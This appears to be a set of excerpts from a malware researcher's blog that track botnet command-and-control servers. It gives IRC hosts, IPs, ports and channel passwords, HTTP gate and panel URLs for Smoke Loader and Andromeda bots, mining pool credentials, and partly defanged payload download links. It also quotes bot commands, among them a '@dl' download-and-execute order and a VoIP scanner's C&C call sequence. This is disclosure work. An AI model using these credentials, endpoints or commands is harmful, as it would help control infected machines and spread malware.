Resolved chat.barracudasec.com to 94.242.204.181
Server: chat.barracudasec.com
Ports: 1337, 4667 (bots connect on 4667)
Channel: #xxploasion, channel password: Rebels2012
Channel: #hflove, channel password: inspiron (connects using the no-ip hostname hflove.no-ip.org)
Channel: #gavin0hanson, channel password: hanson911

Channel        Users  Topic
#xxploasion    4      [+sntu]
#hflove        45     [+s]
#gavin0hanson  53     [+sntu]

This IRC server is similar to cmjc.whhcd.info in that it is...
planetstat2324.su (smoke loader http bot hosted by Poland Artnet Spolka Z Ograniczona Odpowiedzialnoscia)
This is the http loader for the gold installs ppi program.
Resolved planetstat2324.su to 178.255.43.67
Server: planetstat2324.su
Gate file: /gamenew/index.php
Downloads files from ap2producoes.com/images/:
minsabdedf.exe: bitcoin miner, pool info: http://hernyoooo@ymail.com:Bazdmeg1@pool.50btc.com:8332
ginamdasm.exe: the file botnet owners are given; it installs Smoke from hxxp://oroihfdbbnennm.in/update/0pdat3.exe
Install statistics are then recorded by oroihfdbbnennm.in/activation.php using the format activation.php?productid=(userid)&serial=(long string)
Hosting infos: ...
venus.timeinfo.pl (ngrbot irc botnet hosted by 1&1 Internet Ag)
Note: new domains are at the bottom of the post.
This is the Skype “worm” that is in the news right now. Articles:
http://www.techspot.com/news/50443-dorkbot-worm-spreading-via-skype-installs-nasty-ransomware.html
http://news.cnet.com/8301-1009_3-57528353-83/worm-spreading-on-skype-im-installs-ransomware/
http://techcrunch.com/2012/10/08/ransomware-worm-now-spreading-on-skype/
http://www.forbes.com/sites/adriankingsleyhughes/2012/10/08/ransomware-worm-spreading-via-skype/
http://countermeasures.trendmicro.eu/skype-worm-spreading-fast/
Resolved venus.timeinfo.pl to 63.223.107.62, 176.9.192.131, 213.165.71.142, 217.160.108.147, 213.165.71.153, 87.106.98.157, 74.208.112.178
Server: venus.timeinfo.pl
Port: 1863
Password: 24r34t
SSL is needed to connect; accept the invalid certificate.
Authhost: bossman...
b4buj4ym0d3m.nl.ai (Aryan irc botnet hosted by Canada Montreal Ovh Hosting Inc).
Resolved b4buj4ym0d3m.nl.ai to 198.27.119.91
Server: b4buj4ym0d3m.nl.ai
Port: 6969
Channel: #Aryan#
Channel password: Aryan
* Topic for #Aryan# is: @Botkill
* Topic for #Aryan# set by God at Mon Oct 08 01:09:13 2012
No weed MOTD for this one.
Hosting infos: http://whois.domaintools.com/198.27.119.91
lucasbaby.no-ip.info (Irc botnets hosted by Canada Montreal Ovh Hosting Inc.)
Resolved lucasbaby.no-ip.info to 142.4.203.95
Server: lucasbaby.no-ip.info
Port: 6969
Channel: #karmie#
Channel password: 1234
Nick: [USA|XP|gjetth]
Topic for #karmie# is: @dl 1 hxxp://dl.dropbox.com/u/81040225/raw_out.exe
Topic for #karmie# set by God at Sun Oct 07 13:42:09 2012
Opers:
[Boss] (Anxiety@HaZe.GoV): Anxiety
[Boss] ~#karmie#
[Boss] irc.HaZe.GoV :HaZeNet
[Boss] idle 12:09:34, signon: Mon Oct 08 00:16:30
[Boss] End of WHOIS
123.gets-it.net (Ganja ircbot hosted by United States St. Louis Hosting Solutions International Inc)
Resolved 123.gets-it.net to 69.64.62.151
Server: 123.gets-it.net
Port: 6697
* Current Local Users: 34 Max: 40
* Current Global Users: 34 Max: 40
Channel: #Ganja
* Topic for #Ganja is: DO NOT USE THE SPEEDTEST COMMAND!
* Topic for #Ganja set by Anxiety at Sat Oct 06 02:54:30 2012
Opers:
* [Anxiety] (Anxiety@Test-5D47311C.bchsia.telus.net): Anxiety
* [Anxiety] ...
50.7.239.180 (Rage bots hosted by Czech Republic Zlin Fdcservers.net)
Server: 50.7.239.180
Port: 7777
Channel: #rage
* Topic for #rage is: .b0tk1ller 30 .p2p .rarworm .xpl 75 1 75.x.x.x 3 1 76.x.x.x
* Topic for #rage set by cyberthrill at Wed Oct 03 13:55:03 2012
Nick format: L0v3|fQrHrWbarp
Opers:
* [BGChaser] (Ares@sab-5E6EA00F.telnet.bg): Ares
* [BGChaser] @#rinfo @#binfo #rscan @#rage @#bkiller #b
* [BGChaser] 50.7.239.180 :Server...
casinovegas.mobi (voip scanning botnet hosted by United States Missoula Sharktech)
I found this recently and thought it was interesting enough to post. It’s an http-controlled botnet used to scan for voip servers.
Malware actions:
Tells the C&C server it has installed: 208.98.52.163/90/getip.php?action=live
Requests an ip segment to scan: 208.98.52.163/90/getip.php?action=get
Downloads and installs python (needed for the scanner): hxxp://208.98.52.163/90/files/python-2.7.2.msi
IP range to be scanned is confirmed: 208.98.52.163/90/insert.php?action=online&computer=USER-PC&range=95.211.169.45-95.211.199.255
Unrar utility is downloaded: hxxp://208.98.52.163/90/files/UnRAR.exe
Scanner is downloaded: hxxp://208.98.52.163/90/files/pack.rar
The malware...
ns3.captain-packet.net (irc botnet hosted in United States Washington Psinet Inc).
Resolved: [ns3.captain-packet.net] to [154.35.64.24]
Remote host: ns3.captain-packet.net, port number: 3900
PASS zomg
NICK banzl
USER ypawhj 0 0 :banzl
USERHOST banzl
MODE banzl -x+iB
JOIN ###bye### byeeeee
NICK pfyfxd
USER bagjsml 0 0 :pfyfxd
USERHOST pfyfxd
MODE pfyfxd -x+iB
NICK jyptrax
USER xncqm 0 0 :jyptrax
USERHOST jyptrax
MODE jyptrax -x+iB
NICK peaji
USER etngec 0 0 :peaji
USERHOST ...
crysis4.net (Andromeda http bot hosted by Ukraine Ukrainian Internet Names Center Ltd)
Resolved crysis4.net to 91.231.84.114
Gate url: http://crysis4.net/knockout/image.php
Login url: http://crysis4.net/knockout/index.php
Rootkit plugin: http://crysis4.net/test/r.pack
Hosting infos: http://whois.domaintools.com/91.231.84.114